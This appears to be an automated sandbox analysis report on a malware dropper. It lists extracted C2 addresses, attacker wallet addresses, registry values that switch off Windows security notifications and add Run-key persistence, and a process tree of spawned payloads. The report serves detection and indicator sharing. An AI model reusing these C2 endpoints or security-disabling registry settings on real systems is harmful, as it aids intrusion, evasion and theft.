amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
82s
max time network
473s
platform
windows10-1703_x64
resource
win10-20240319-en
resource tags

arch:x64arch:x86image:win10-20240319-enlocale:en-usos:windows10-1703-x64system
submitted
09-04-2024 08:32

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

amadey asyncrat phorphiex redline stealc zgrat kz1 discovery evasion infostealer loader persistence rat stealer trojan worm

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

KZ1

77.232.132.25:5001

Mutex

AsyncMutex_6SI8OJU68

Attributes

delay
3
install
false
install_file
service.exe
install_folder
%AppData%

aes.plain

Extracted

Family

redline

185.215.113.67:26260

Extracted

Family

phorphiex

http://185.215.113.66/

Wallets

0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b

THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto

1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6

qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL

LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX

rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH

ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ

48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg

3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC

3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3

D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH

t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn

bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd

bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg

bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE

Extracted

Family

amadey

Version

4.18

http://185.172.128.3

Attributes

install_dir
One_Dragon_Center
install_file
MSI.CentralServer.exe
strings_key
fd2f5851d3165c210396dcbe9930d294
url_paths
/QajE3OBS/index.php

rc4.plain

Extracted

Family

stealc

http://94.156.8.100

Attributes

url_path
/5dce321003e6a6b5.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 26 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1568-28-0x0000000005D60000-0x0000000006210000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-29-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-30-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-33-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-35-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-40-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-44-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-48-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-50-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-53-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-56-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-58-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-62-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-64-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-66-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-68-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-83-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-93-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-88-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-101-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-105-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-109-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-115-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-117-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-121-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1
behavioral2/memory/1568-125-0x0000000005D60000-0x000000000620B000-memory.dmp	family_zgrat_v1

Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe	family_redline
behavioral2/memory/3824-47-0x0000000000CD0000-0x0000000000D20000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Windows security bypass 2 TTPs 18 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

twztl.exe1455327696.exe269701059.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	269701059.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe	family_asyncrat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	net_reactor
behavioral2/memory/4108-4519-0x0000000000780000-0x0000000000CEC000-memory.dmp	net_reactor

Executes dropped EXE 17 IoCs

Processes:

cp.exeasyns.exeasdfg.exeama.exeRDX.exeghjk.exetwztl.exe269701059.exeMSI.CentralServer.exeMSI.CentralServer.exe1455327696.exe341011103.exe3099530236.exe46273284.exe2961924308.exe68073430.exe796127970.exe

pid	process
2868	cp.exe
3136	asyns.exe
1568	asdfg.exe
3812	ama.exe
3824	RDX.exe
1148	ghjk.exe
4204	twztl.exe
4828	269701059.exe
4136	MSI.CentralServer.exe
1420	MSI.CentralServer.exe
3416	1455327696.exe
4604	341011103.exe
400	3099530236.exe
2412	46273284.exe
4340	2961924308.exe
1320	68073430.exe
4624	796127970.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 21 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

twztl.exe1455327696.exe269701059.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	269701059.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	1455327696.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	1455327696.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

twztl.exe269701059.exe1455327696.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winpsdrvnas.exe"	twztl.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3971934951-2222591486-1444465656-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\winpsdrvnas.exe"	twztl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe"	269701059.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3971934951-2222591486-1444465656-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe"	269701059.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe"	1455327696.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3971934951-2222591486-1444465656-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe"	1455327696.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

310 pastebin.com
311 pastebin.com

flow	ioc
310	pastebin.com
311	pastebin.com

Drops file in Windows directory 8 IoCs

Processes:

ama.exe269701059.exe1455327696.exetwztl.execp.exe

description	ioc	process
File created	C:\Windows\Tasks\MSI.CentralServer.job	ama.exe
File created	C:\Windows\syspplsvc.exe	269701059.exe
File opened for modification	C:\Windows\syspplsvc.exe	269701059.exe
File created	C:\Windows\winakrosvsa.exe	1455327696.exe
File opened for modification	C:\Windows\winakrosvsa.exe	1455327696.exe
File created	C:\Windows\winpsdrvnas.exe	twztl.exe
File opened for modification	C:\Windows\winpsdrvnas.exe	twztl.exe
File created	C:\Windows\Tasks\MSI.CentralServer.job	cp.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

6216 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
6216	sc.exe

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	process	target process
4008	236	WerFault.exe	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
1516	6084	WerFault.exe	32.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3020 schtasks.exe
6136 schtasks.exe
4908 schtasks.exe
364 schtasks.exe
7080 schtasks.exe
3924 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5640 timeout.exe

pid	process
3020	schtasks.exe
6136	schtasks.exe
4908	schtasks.exe
364	schtasks.exe
7080	schtasks.exe
3924	schtasks.exe

pid	process
5640	timeout.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

asyns.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	asyns.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	asyns.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5300 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

RDX.exe

pid process

3824 RDX.exe
3824 RDX.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

269701059.exe

pid process

4828 269701059.exe

pid	process
5300	PING.EXE

pid	process
3824	RDX.exe
3824	RDX.exe

pid	process
4828	269701059.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

FUCKER.exeasdfg.exeasyns.exeghjk.exeRDX.exe

description	pid	process
Token: SeDebugPrivilege	4920	FUCKER.exe
Token: SeDebugPrivilege	1568	asdfg.exe
Token: SeDebugPrivilege	3136	asyns.exe
Token: SeDebugPrivilege	1148	ghjk.exe
Token: SeDebugPrivilege	3824	RDX.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

FUCKER.exetwztl.exeama.exe269701059.exe

description	pid	process	target process
PID 4920 wrote to memory of 2868	4920	FUCKER.exe	cp.exe
PID 4920 wrote to memory of 2868	4920	FUCKER.exe	cp.exe
PID 4920 wrote to memory of 2868	4920	FUCKER.exe	cp.exe
PID 4920 wrote to memory of 3136	4920	FUCKER.exe	asyns.exe
PID 4920 wrote to memory of 3136	4920	FUCKER.exe	asyns.exe
PID 4920 wrote to memory of 3136	4920	FUCKER.exe	asyns.exe
PID 4920 wrote to memory of 1568	4920	FUCKER.exe	asdfg.exe
PID 4920 wrote to memory of 1568	4920	FUCKER.exe	asdfg.exe
PID 4920 wrote to memory of 1568	4920	FUCKER.exe	asdfg.exe
PID 4920 wrote to memory of 3812	4920	FUCKER.exe	ama.exe
PID 4920 wrote to memory of 3812	4920	FUCKER.exe	ama.exe
PID 4920 wrote to memory of 3812	4920	FUCKER.exe	ama.exe
PID 4920 wrote to memory of 3824	4920	FUCKER.exe	RDX.exe
PID 4920 wrote to memory of 3824	4920	FUCKER.exe	RDX.exe
PID 4920 wrote to memory of 3824	4920	FUCKER.exe	RDX.exe
PID 4920 wrote to memory of 1148	4920	FUCKER.exe	ghjk.exe
PID 4920 wrote to memory of 1148	4920	FUCKER.exe	ghjk.exe
PID 4920 wrote to memory of 1148	4920	FUCKER.exe	ghjk.exe
PID 4920 wrote to memory of 4204	4920	FUCKER.exe	twztl.exe
PID 4920 wrote to memory of 4204	4920	FUCKER.exe	twztl.exe
PID 4920 wrote to memory of 4204	4920	FUCKER.exe	twztl.exe
PID 4204 wrote to memory of 4828	4204	twztl.exe	269701059.exe
PID 4204 wrote to memory of 4828	4204	twztl.exe	269701059.exe
PID 4204 wrote to memory of 4828	4204	twztl.exe	269701059.exe
PID 3812 wrote to memory of 4136	3812	ama.exe	MSI.CentralServer.exe
PID 3812 wrote to memory of 4136	3812	ama.exe	MSI.CentralServer.exe
PID 3812 wrote to memory of 4136	3812	ama.exe	MSI.CentralServer.exe
PID 4204 wrote to memory of 3416	4204	twztl.exe	1455327696.exe
PID 4204 wrote to memory of 3416	4204	twztl.exe	1455327696.exe
PID 4204 wrote to memory of 3416	4204	twztl.exe	1455327696.exe
PID 4828 wrote to memory of 4604	4828	269701059.exe	341011103.exe
PID 4828 wrote to memory of 4604	4828	269701059.exe	341011103.exe
PID 4828 wrote to memory of 4604	4828	269701059.exe	341011103.exe
PID 4204 wrote to memory of 400	4204	twztl.exe	3099530236.exe
PID 4204 wrote to memory of 400	4204	twztl.exe	3099530236.exe
PID 4204 wrote to memory of 400	4204	twztl.exe	3099530236.exe
PID 4828 wrote to memory of 2412	4828	269701059.exe	46273284.exe
PID 4828 wrote to memory of 2412	4828	269701059.exe	46273284.exe
PID 4828 wrote to memory of 2412	4828	269701059.exe	46273284.exe
PID 4204 wrote to memory of 4340	4204	twztl.exe	2961924308.exe
PID 4204 wrote to memory of 4340	4204	twztl.exe	2961924308.exe
PID 4204 wrote to memory of 4340	4204	twztl.exe	2961924308.exe
PID 4828 wrote to memory of 1320	4828	269701059.exe	68073430.exe
PID 4828 wrote to memory of 1320	4828	269701059.exe	68073430.exe
PID 4828 wrote to memory of 1320	4828	269701059.exe	68073430.exe
PID 4828 wrote to memory of 4624	4828	269701059.exe	796127970.exe
PID 4828 wrote to memory of 4624	4828	269701059.exe	796127970.exe
PID 4828 wrote to memory of 4624	4828	269701059.exe	796127970.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2868
- C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  PID:3136
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
    "C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe"
    3⤵
    - Executes dropped EXE
    PID:4136
- C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3824
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
  2⤵
  - Windows security bypass
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4204
- - C:\Users\Admin\AppData\Local\Temp\269701059.exe
    C:\Users\Admin\AppData\Local\Temp\269701059.exe
    3⤵
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Users\Admin\AppData\Local\Temp\341011103.exe
      C:\Users\Admin\AppData\Local\Temp\341011103.exe
      4⤵
      Executes dropped EXE
      PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\46273284.exe
      C:\Users\Admin\AppData\Local\Temp\46273284.exe
      4⤵
      Executes dropped EXE
      PID:2412
  - - C:\Users\Admin\AppData\Local\Temp\68073430.exe
      C:\Users\Admin\AppData\Local\Temp\68073430.exe
      4⤵
      Executes dropped EXE
      PID:1320
  - - C:\Users\Admin\AppData\Local\Temp\796127970.exe
      C:\Users\Admin\AppData\Local\Temp\796127970.exe
      4⤵
      Executes dropped EXE
      PID:4624
- - C:\Users\Admin\AppData\Local\Temp\1455327696.exe
    C:\Users\Admin\AppData\Local\Temp\1455327696.exe
    3⤵
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Drops file in Windows directory
    PID:3416
- - C:\Users\Admin\AppData\Local\Temp\3099530236.exe
    C:\Users\Admin\AppData\Local\Temp\3099530236.exe
    3⤵
    - Executes dropped EXE
    PID:400
- - C:\Users\Admin\AppData\Local\Temp\2961924308.exe
    C:\Users\Admin\AppData\Local\Temp\2961924308.exe
    3⤵
    - Executes dropped EXE
    PID:4340
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c shutdown /r
      4⤵
      PID:6108
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown /r
        5⤵
        
        PID:5456
- - C:\Users\Admin\AppData\Local\Temp\804818186.exe
    C:\Users\Admin\AppData\Local\Temp\804818186.exe
    3⤵
    PID:1400
  - - C:\Users\Admin\AppData\Local\Temp\2482911982.exe
      C:\Users\Admin\AppData\Local\Temp\2482911982.exe
      4⤵
      PID:612
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:4108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:1616
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:4288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
